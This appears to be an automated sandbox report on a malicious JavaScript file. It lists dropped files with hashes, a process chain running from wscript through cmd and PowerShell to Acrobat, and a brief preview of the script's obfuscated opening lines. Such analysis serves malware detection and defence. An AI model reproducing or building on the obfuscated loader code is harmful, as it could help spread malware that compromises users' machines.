SSDEEP: | 6:YEQXJ2HXPSW574Dpn2UXjb24kF0YkcdoAvJfbPtdPeUkwRe9:YvXKXqQ7O12UTbdzGDV8Ukee9 |
MD5: | 709D2C597B69DC34E9C784E544D96CCF |
SHA1: | 5B34EAA1C827FDBF6F37DD4E5494FAEA9E3A1B1F |
SHA-256: | 68F9626FB32B801D43B5077B494AB3288F8C412405F91F861B9A17AD0BFE2651 |
SHA-512: | 70643386ED35928BD74206F4611F9574C472865E3F1AB0C160034408F4D0B1629A8D516ADA08CC13DF5996FB14FAAEABF9CC40620C5E56017F9507475BFECCC5 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.298405152841676 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPSW574Dpn2UXjb24kF0YkcdoAvJf21rPeUkwRe9:YvXKXqQ7O12UTbdzG+16Ukee9 |
MD5: | 629907AD926EA1022C66F6726EC90C0F |
SHA1: | 2138917318C34814D352937358453E4BD5F5716A |
SHA-256: | 4865DFE0FD2D508B715B3639BF366EB9336C118858D6D00A54DC58265AD7890F |
SHA-512: | 4FFB4A15FB66772C7113DE4D6834031EBAA84E1B4D98BA7D63E32F09FC92F2C1529E314EFF682C1F0BB0DEEA7EEA977AC77144AF15C2F71441C6F21ECB2AAAAC |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.664021847382102 |
Encrypted: | false |
SSDEEP: | 24:Yv6XV7O12UXGamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BS7:Yv6zwIBgkDMUJUAh8cvM7 |
MD5: | ADD552B7813525347F7DAD79F02F85DA |
SHA1: | 856DAA86759D71053AED4885B1986E9A5690A2C6 |
SHA-256: | CAE37FBB883BA587451194AAE4D8416B16E11C9AD0355739475978BE5224989E |
SHA-512: | DC739A7E76863E9CEBD188FF64641A36AB85D6387EC7C13910BD06F68FB2BE82B71561A7ED7D790F733ADC81B2FED5BCA0B4A13E4480FAC95039BB75430FF8D0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.274734208187469 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPSW574Dpn2UXjb24kF0YkcdoAvJfshHHrPeUkwRe9:YvXKXqQ7O12UTbdzGUUUkee9 |
MD5: | 4321452983B255F8D7A2A841C0EA2B5A |
SHA1: | BBBA755F1E7FF2D7A31EEEC80A16223CA01CE621 |
SHA-256: | 5D384964B7CF200497728E21C56F3ED6BCCCEC5912B95F3270F472094415BC1C |
SHA-512: | F2B1721368E73CEB9882BE3430B1536E24F0162EB39339D18E20F58288B19DAB5A028080C400207D6CA722F7DA5AFDDE099B356CE6DD0A6CCB01592E938F41FC |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.286091485569333 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPSW574Dpn2UXjb24kF0YkcdoAvJTqgFCrPeUkwRe9:YvXKXqQ7O12UTbdzGTq16Ukee9 |
MD5: | 7288165C2DBE97218BC7FEE9BF7DF252 |
SHA1: | EBDD2328FCEDB8404984F1B421EDB36C9F119A44 |
SHA-256: | EB7EE5EF714A6CC4E1E5534E2A49F4CE6588DEDA3A177CC64863A357212AC8B1 |
SHA-512: | CA5DFF4811DEEAEBC9963E9BB0997D68A770C769DBFDD921AD5549CBA21A9CA12BC25EFC08F4787F5EA2B914F22C8971F283A8A27AB8514189233C4469E859C2 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.131409215252593 |
Encrypted: | false |
SSDEEP: | 24:YLUaZa3ay60ZU2DS59WVBRqc9LAjGJsj0SUAg2Gv3x2LSmCWPpDjuMtSOVv5+79z:YsM02f59WVmLw+G/JcpBDSMYO1o79z |
MD5: | 4589BF120DBF7DE9B616259C18F56E19 |
SHA1: | 44CCD977F6ECEC477F89DFB637DD15E5430C10A2 |
SHA-256: | BED5480518DD6CB420A9AF3EFE0B462BAC8D26F42F8BD0F39721BBF1B607497F |
SHA-512: | E83B44EAF6A907669CF20BDD0CFDF07BB725F8B6541EA241AE6D61EF4A6B1596FE96A1F66DCC2A2B77CDFF7510E927496366B2521A9103858C89EA74B90CF279 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.3190675469793822 |
Encrypted: | false |
SSDEEP: | 48:TGufl2GL7msUKB0M0+Tb608YKTYTrSTYa:lNVmsTFb608YKBR |
MD5: | 6FA42B3791984492DF9EF3F793AE3D9E |
SHA1: | 11B59FDFE5250360E1AC9FDC3F23D7EB2E2167D2 |
SHA-256: | FB68D0E90AB31EB4F663FB0AA918B1FC4FDA685758460001788DA4D480904558 |
SHA-512: | 2552CFEC6D35DF30750C4F4BBDE322DA4A5BAA29031B15E22C18EE764343B296227580280DF8566AFE302EEC24894ABF1DC9C1C1130A810564AA1C640AF85A19 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.7814861821260704 |
Encrypted: | false |
SSDEEP: | 48:7MV8KB0M0+Tb608YKTYKrGKxqFl2GL7msk:7WLFb608YKJxKVmsk |
MD5: | D194A7F698BC6ACF10AA0F78390B9798 |
SHA1: | E6BDBFA012C355B48E9D12ECC4904E508A4F1D7B |
SHA-256: | 17492CB6C297D1B7CF7504CEFB9B3C94E49880D8C5E0A3D81CA2BF9D669BC29E |
SHA-512: | 7E314B32DF0AF457EE00430118AA4E1A1F4B8EFC1FDFA89E8DDA5EC6642D5292966E9E7DCD18902272A32EC20BA099BF82CCD334B9B75DB5CF53D4A71A2E5715 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgM5C/C9Nq/jXyiIXfOW53OfPdYyu:6a6TZ44ADEM5V9Nq/LyXgdK |
MD5: | 02EEB1357DB61D8CA13A3C71EAD2A8E1 |
SHA1: | FB2FCEB98E8F961F05BEC5B122AD3DF14BFA1C12 |
SHA-256: | 1FF9FE5A010E3BD2F31B2204AFF581EB53CE113E4D963C47F082CA5BFAB81A3F |
SHA-512: | 4A2D70C61CD06642F6659FD152EC0E4128071B54C0FDB63F9B082B27FE231CB94B2454C8D3A9DA63B06B99681199960E6B7A1F4C1671AF283ACEA6D458A6C3ED |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulnmWllZ:NllUmWl |
MD5: | 3EBBEC2F920D055DAC842B4FF84448FA |
SHA1: | 52D2AD86C481FAED6187FC7E6655C5BD646CA663 |
SHA-256: | 32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09 |
SHA-512: | 163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.5020010357239357 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClETlww:Qw946cPbiOxDlbYnuRK+bDr |
MD5: | 34CB64F971B35B8A821B09EDDE24C790 |
SHA1: | 3036598A9E02F04737E8A8D301F65B2682CFF67B |
SHA-256: | 5036414FD57C0178F54BF140EEAE2E86E26A4837AE7791D23131A53584296993 |
SHA-512: | F222C2909DC9315882C6BC999FB6600C3F473C5E805EAB3AAF9A73C612E7E2D755D5595856A434386B904429115173AAEA5B3765E65E24A0485ADEF9CD8C625A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 11-40-02-277.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.361022727805069 |
Encrypted: | false |
SSDEEP: | 384:cBD67lQV4j1MOuD/btX+wknz+fzTqyorqz3tVFr84AbAYpfFWbWt+Fjwn0z5O+Wf:4M5 |
MD5: | 70A2D078BEFD5E910EE035832171B399 |
SHA1: | 1AB91914ECD7852E512C73437D30013594A16FB0 |
SHA-256: | 2B55DE84E5446FD295128DAD5827122E98AC784F96A1F422B711B14E8F7DB1ED |
SHA-512: | 9FF36D4E320A8791AB0B87F24CAB4CBE777D9E8A3A64D26AF419132CDFDFCCD9A253EE9854032C4C87C546187951077F869CBCBDC9513278C557FC4895C7DBBC |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15111 |
Entropy (8bit): | 5.341021835665198 |
Encrypted: | false |
SSDEEP: | 384:4plANJcOggvYFvPO9eQ/xSDj8nmC1d3lBOxy02mHFxnBbH++WJfN8T81EfhsrWGo:vPI |
MD5: | 6218C76326928357838B1ABBFC08DE02 |
SHA1: | 9BE00D80FDEF09B3D041349693A9FCF0D642242B |
SHA-256: | 1ECE2B734ACBBA511DB36DE89B15273E52A3987CEAAF1BE9B3E5ABAA7912B425 |
SHA-512: | A8869EFDB1A3CCA8761A882F69D4163806FCE2718964DFAE0178962650F10D6FED6B54FAC1A8A6DBBBC06E45958F6E32AAFAC649F2F63D9A4E1FC016E763C688 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.39492148808917 |
Encrypted: | false |
SSDEEP: | 192:zcbaIGkcbIcbiIICcbBOQQ0fQNCHPaPOhWPOA3mbSAcbsGC9GZPOdIzZMJzV3ZmU:EGvIcNYdAIugd |
MD5: | DB990057EBB9786A5501831329D7B478 |
SHA1: | 047EBD5BE584D23D6B7000893C4F643486837279 |
SHA-256: | EFE2EFFC64359255F2F3F364FB1AA5D51685E79249ACC5A12B4C22EDC05A9A66 |
SHA-512: | 028600C1D69EFC6FB769EA576028EA568F39760FDCDC5AE73B01383C0A4A7951A3FEAF254E17E2F08B8720C8DAEF5E6D390FFC30E94758F8A7737EBF864C22E2 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9UQ:O3Pjegf121YS8lkipdjMMNB1DofjgJJs |
MD5: | 411E1D966EDAB90136CB7B3581B3DD2D |
SHA1: | 650E5BF319B35D52B6AD00A3C45F3153E061A687 |
SHA-256: | C4AF78A233EAD1866C70361FA9F8287D7297FEF19138B4C4885249658B6EEC4D |
SHA-512: | 920F575BCE6933F64A7367B22C80BB04EE367B29CC5C12C82C494620727B69828AE26EB6CD3A4E3B4D6196017E06D8514C686D5CE89B6CACF1B9B0A06718B6AB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/nZwYIGNPzWL07oYGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:fZwZG5WLxYGZn3mlind9i4ufFXpAXkru |
MD5: | F43041C007C55C623135DD65EBCBE292 |
SHA1: | 0F5781369DB2C967A1795898030244B2E9D561F6 |
SHA-256: | 4F7827EA2E3ACAA6A1B5BC7969516DD8EF08AC789E9C5FBCE61A71D0553C2B8D |
SHA-512: | E5D1D615B902E4D66FD550BDF1418FE7D70BC08548EA006891F90CB183299D6700547205A3F2FEED6AE2C2F3A95B5F094356E4FB5451A36C4555CBFABE4D44F5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLsGZBZwYIGNPJe:RB3mlind9i4ufFXpAXkrfUs03WLsGZBe |
MD5: | 8EC2C99A7A3C5FDEBC1819D13F5E9469 |
SHA1: | 26FB55EEFAD17F9C742D245CDC69643B3246CF0C |
SHA-256: | 16B88B68807229BBE929ADC8E65E2BF5472292A5D16D81657A78C2DA1C2FD34C |
SHA-512: | 94CAF00AD7D06EBFA4FC06A1DD6B9EF3DD5B0E402BE491A72D3EB4E23B190E72268571DD65D8F3DCA53B3BF7461DC6E21A6FC81C57263C4D7F959975731691C1 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.897186953829595 |
TrID: | |
File name: | 124651728043662978.js |
File size: | 22'338 bytes |
MD5: | 986317995636857f8178cfdca38244a8 |
SHA1: | ff7c73a9ce17ec8deefc278b02012a01f3552ba2 |
SHA256: | dc378660bfde887093e3d911ba63c3f816061f3d24b5698382f1cb35e69c3585 |
SHA512: | 2ed989f9992f2b470f589e517af0449a6824c2bddfd5e8a8fe6265ff1891e6cb0dc279b9a258cad75e955b082323b5c1ccc0a6c54d1cb97b88f7edbbe526a062 |
SSDEEP: | 384:rEJif2/JwJfJutUJE3gfNZiNXTbPjPiDKs/ZANOY+I/5i+xTRS0sD+Vlx5hJ0lF5:gJif2+sYfNZiNXTbPjPiDKs/ZANOY+I+ |
TLSH: | 58A221E1D0065EB386FC03650B9F61FA2D68DA0A4E5949DA8029F9D5DBC1720B4F32BD |
File Content Preview: | function joevwenx(){skfcvswhq=[1031,3079,5127,4103,2055,3072];var feabrtmy=this[pwpqtw+egxvavw+fqqoxrc+htard+ermfgwlpf+qwvkrky+pdyvymf+rbbep](this[tytrnt+tbjhype+phbhkhb+fqqoxrc+szfceyh+pwpqtw+rbbep][gciioga+fqqoxrc+ermfgwlpf+egxvavw+rbbep+ermfgwlpf+rzeon |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 1 |
Start time: | 11:39:52 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff695e80000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 11:39:53 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7f94a0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 11:39:53 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff620390000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 11:39:53 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b2bb0000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 11:39:58 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff64eb90000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 11:39:58 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7f94a0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 11:39:58 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7f5890000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 11:39:58 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff63ec50000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 11:39:59 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7df220000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 11:39:59 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff63ec50000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function joevwenx() { |
|
1 | skfcvswhq = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
